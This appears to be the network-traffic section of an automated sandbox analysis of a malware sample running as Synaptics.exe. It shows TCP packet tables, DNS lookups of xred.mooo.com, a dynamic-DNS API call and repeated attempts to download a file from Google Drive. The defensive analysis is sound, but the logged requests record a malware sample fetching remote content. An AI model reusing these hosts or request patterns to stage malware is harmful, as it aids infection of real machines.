                                                                                                                Dec 30, 2024 10:58:31.767631054 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.775801897 CET44359923142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.775861979 CET44359923142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.775867939 CET59923443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.775897026 CET44359923142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.775923014 CET59923443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.775978088 CET59923443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.775985003 CET44359923142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.775995016 CET44359923142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.776040077 CET59923443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.776040077 CET59923443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.776709080 CET59923443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.776724100 CET44359923142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.777313948 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.777338028 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.777641058 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.777642012 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.777667999 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.930766106 CET44359925142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.930818081 CET44359925142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.930927992 CET44359925142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.930953979 CET59925443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.931049109 CET59925443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.931865931 CET59925443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.931883097 CET44359925142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.932401896 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.932431936 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:31.932548046 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.932791948 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:31.932801962 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.377286911 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.377430916 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.377747059 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.377806902 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.389316082 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.389390945 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.396919012 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.396924019 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.399655104 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.399660110 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.401874065 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.401889086 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.404375076 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.404383898 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.405647039 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.405656099 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.406039000 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.406044960 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.532145977 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.533866882 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.588313103 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.588331938 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.588519096 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.588524103 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.748517990 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.749537945 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.749733925 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.772643089 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773564100 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.773590088 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773639917 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.773900032 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773942947 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773997068 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.796575069 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796726942 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796792984 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.796811104 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796850920 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.796863079 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796902895 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.796937943 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.797030926 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.797075033 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.810771942 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.810811996 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.810939074 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.811110973 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.811125040 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.811141014 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.811186075 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812069893 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812112093 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.812236071 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812433004 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812473059 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.812573910 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812983036 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812999010 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.813267946 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.813280106 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.813641071 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.813673019 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.813796043 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.814393044 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.814404964 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.412431002 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.412575960 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.413165092 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.413258076 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.421472073 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.421597958 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.438857079 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.438864946 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.439076900 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.439081907 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.439426899 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.439435959 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.439552069 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.439555883 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.441008091 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.441023111 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.441232920 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.441246033 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.783026934 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.783083916 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.783107996 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.198065042 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.198112011 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.198143005 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.198191881 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.473006964 CET44360043216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.473190069 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:46.474586010 CET44360042216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.474726915 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:50.451961040 CET4970880192.168.2.769.42.215.252
                                                                                                                Dec 30, 2024 10:58:50.453593969 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:50.453654051 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:50.453701019 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:59.134243965 CET555249728172.111.138.100192.168.2.7
                                                                                                                Dec 30, 2024 10:58:59.177408934 CET497285552192.168.2.7172.111.138.100
                                                                                                                Dec 30, 2024 10:59:35.571822882 CET555249728172.111.138.100192.168.2.7
                                                                                                                Dec 30, 2024 10:59:35.615364075 CET497285552192.168.2.7172.111.138.100
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 30, 2024 10:58:08.755585909 CET4988853192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:08.762170076 CET53498881.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.589566946 CET5101853192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:09.596779108 CET53510181.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.605763912 CET6270253192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:09.612328053 CET53627021.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.821223974 CET5999253192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:09.829541922 CET53599921.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:16.228404999 CET6214253192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:16.235618114 CET53621421.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:20.715626955 CET53606401.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:20.970328093 CET5518353192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:20.977950096 CET53551831.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:26.657561064 CET5825353192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:26.664838076 CET53582531.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.522968054 CET5261753192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:33.530014992 CET53526171.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 10:58:08.755585909 CET | 192.168.2.7 | 1.1.1.1 | 0xff7c | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:09.589566946 CET | 192.168.2.7 | 1.1.1.1 | 0x7d74 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:09.605763912 CET | 192.168.2.7 | 1.1.1.1 | 0xbff3 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:09.821223974 CET | 192.168.2.7 | 1.1.1.1 | 0x570d | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:16.228404999 CET | 192.168.2.7 | 1.1.1.1 | 0xe367 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:20.970328093 CET | 192.168.2.7 | 1.1.1.1 | 0x77d4 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:26.657561064 CET | 192.168.2.7 | 1.1.1.1 | 0x5f73 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:33.522968054 CET | 192.168.2.7 | 1.1.1.1 | 0x4b3e | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 10:58:08.762170076 CET | 1.1.1.1 | 192.168.2.7 | 0xff7c | No error (0) | docs.google.com | | 216.58.206.46 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:09.596779108 CET | 1.1.1.1 | 192.168.2.7 | 0x7d74 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:09.612328053 CET | 1.1.1.1 | 192.168.2.7 | 0xbff3 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:09.829541922 CET | 1.1.1.1 | 192.168.2.7 | 0x570d | No error (0) | drive.usercontent.google.com | | 142.250.181.225 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:16.235618114 CET | 1.1.1.1 | 192.168.2.7 | 0xe367 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:20.977950096 CET | 1.1.1.1 | 192.168.2.7 | 0x77d4 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:26.664838076 CET | 1.1.1.1 | 192.168.2.7 | 0x5f73 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:33.530014992 CET | 1.1.1.1 | 192.168.2.7 | 0x4b3e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false

                                                                                                                • docs.google.com
                                                                                                                • drive.usercontent.google.com
                                                                                                                • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49708 | 69.42.215.252 | 80 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:58:09.618555069 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                User-Agent: MyApp
                                                                                                                Host: freedns.afraid.org
                                                                                                                Cache-Control: no-cache
Dec 30, 2024 10:58:10.203069925 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                Vary: Accept-Encoding
                                                                                                                X-Cache: MISS
                                                                                                                Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:09 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZYVWoasOPS1ZSSUjTP-vJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49705 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:09 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-b8TBxOJkFgJx9yvH1KXdLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49709 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-NMo4d2pwopBYogv37RGpCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49710 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:10 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
2024-12-30 09:58:10 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5r8jFWtqrVC47XzG0fLubod6JG3bxMGlzbjdG6MT86GGvmDeWf1cnhr2RzOiOCJsXt
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-7bGKJL25SjQ8hx360BBjSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Set-Cookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E; expires=Tue, 01-Jul-2025 09:58:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
2024-12-30 09:58:10 UTC | 1594 | IN
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aiQjOPITVy8kPZhDEVnYTg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 09:58:10 UTC | 58 | IN
                                                                                                                Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49712 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
2024-12-30 09:58:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:10 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZMZ-_af7m91UULobl8DFhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
